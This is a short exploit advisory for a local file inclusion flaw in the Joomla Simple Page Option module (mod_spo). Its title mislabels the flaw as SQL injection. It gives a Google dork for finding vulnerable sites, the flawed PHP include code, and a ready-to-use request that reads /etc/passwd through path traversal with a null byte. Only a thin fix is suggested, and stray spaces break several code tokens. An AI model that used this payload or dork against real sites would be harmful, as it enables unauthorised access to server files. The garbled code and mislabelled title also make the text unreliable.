Joomla Component mod_spo SQL Injection Vulnerability

# Exploit Title: Simple Page Option LFI

# Google Dork: inurl:mod_spo

# Date: 15/07/2011

# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca

# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip

# Version: 1.5.x

# Tested on: Backtrack and Windows 7

Simple Page Option – LFI

Vulnerable-Code:

$s_lang

=& JRequest::getVar('spo_site_lang');

(file_exists(dirname(__FILE__).DS.'languages'.DS.$ s_lang.'.php'))

? include(dirname(__FILE__).DS.'languages'.DS.$s_lan g.'.php')

: include(dirname(__FILE__).DS.'languages'.DS.'engli sh.php');

Vulnerable-Var:

spo_site_lang=

Expl0iting:

http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst

/* */

&spo_f_email[0]=sample@email.tst

/* */

&spo_message=20&spo_msg_ftr=This%20contact%20messa ge%20was%20generated%20using[/CODE]

%20Simple%20Page%20Options%20Module%20from%20SITEU RL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&sp o_url2se

Reparing?:

Just Filter with str_replace(); or htaccess protection to the vulnerable file.

gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.